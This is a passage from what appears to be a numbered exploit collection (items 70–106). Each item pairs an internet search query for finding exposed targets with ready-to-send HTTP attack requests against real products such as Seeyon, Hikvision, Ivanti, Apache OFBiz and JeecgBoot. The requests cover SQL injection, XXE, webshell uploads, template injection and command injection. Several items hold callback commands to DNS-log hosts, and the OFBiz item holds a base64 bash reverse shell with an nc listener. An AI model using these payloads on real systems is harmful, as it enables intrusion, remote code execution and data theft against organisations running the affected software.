User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu ezEIP success command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. Bangyong PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon M3-server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec 掌上校园 service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software system UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Superdata 天耀 software DesignReportSave.jsp endpoint arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview video surveillance main-cgi password disclosure
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"
POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The exploit request is shown below; it drops a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Tosei (Japan) self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAppSecurity 明御 security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. DBAppSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. Seeyon FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision operations management center session command execution
Fastjson command execution
hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. Qi An Xin Legendsec SecGate3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi-Anxin Wangshen SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Verify by fetching the file that was uploaded in this request (the filename in the verification GET must match the filename sent above):
GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
The requirePasswordChange=Y parameter bypasses authentication on the xmlrpc endpoint; the XML-RPC <serializable> extension then deserializes the attacker-supplied Java object.
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial (the gadget chain and the DNS-log callback host are the ones used in the source post):
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Replace the placeholder in the POC above with the generated base64 and send it:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz < 18.12.11 Groovy remote code execution (ProgramExport)
FOFA:app="Apache_OFBiz"
The same requirePasswordChange=Y trick reaches the ProgramExport page, which evaluates the groovyProgram parameter as a Groovy script. Throwing the command output inside an exception returns it in the response.
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on the attacker host (Kali in the source post):
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 130

groovyProgram='bash+-c+{echo,YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3IDA%2BJjE%3D}|{base64,-d}|{bash,-i}'.execute();

The base64 is bash -i >& /dev/tcp/192.168.40.128/7777 0>&1 (listener 192.168.40.128:7777). Because the body is form-encoded, the + and = characters inside the base64 must be sent as %2B and %3D, otherwise the server decodes + as a space and the decoded command breaks. The version of this POC that circulates was base64-encoded from an already URL-encoded command and decodes to bash%20-i%20>&%20/dev/tcp/... with literal %20 in it, which bash does not execute; regenerate the base64 from the plain command as shown here.

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
The script parameter is wrapped into a JavaScript function by the server; the leading %7D (}) closes that function body so the Java.type(...) call runs when the function is saved.
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast (盈可视) HD intelligent lecture-capture system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

Decoded, the body is {"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | echo hello"]}; the param string reaches a shell, so the | echo hello tail is where the injected command goes.


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--


101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
The ../../ traversal reaches the keys-status endpoint, which normally sits behind authentication, and the %3b (;) terminates the expected argument so that the rest of the path runs as a shell command; a hit on the DNS-log host confirms execution.
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
The SAML component fetches the URI in ds:RetrievalMethod while resolving the signing key, before the (bogus) signature is checked; a DNS or HTTP hit on the callback host confirms the SSRF. The body is shown pretty-printed below; set Content-Length to the length of the body as actually sent.
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/>
        <ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 of the following XML. It declares a parameter entity that points at an external URL, so a DNS request for the callback host proves the parser resolved it (out-of-band XXE); nothing is reflected in the response.
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>


104. TOTOLINK T8 device cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
The topicurl handler accepts an empty token, so the system status/config object is returned without authentication.
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"topicurl":"getSysStatusCfg","token":""}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
The query-string key itself is concatenated into the SQL statement (updatexml-based error injection). The endpoint requires a Blade-Auth JWT; the one below is the long-lived administrator token of the default deployment and is only accepted where the target still validates tokens with the same signing key, otherwise use a token issued by the target.
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
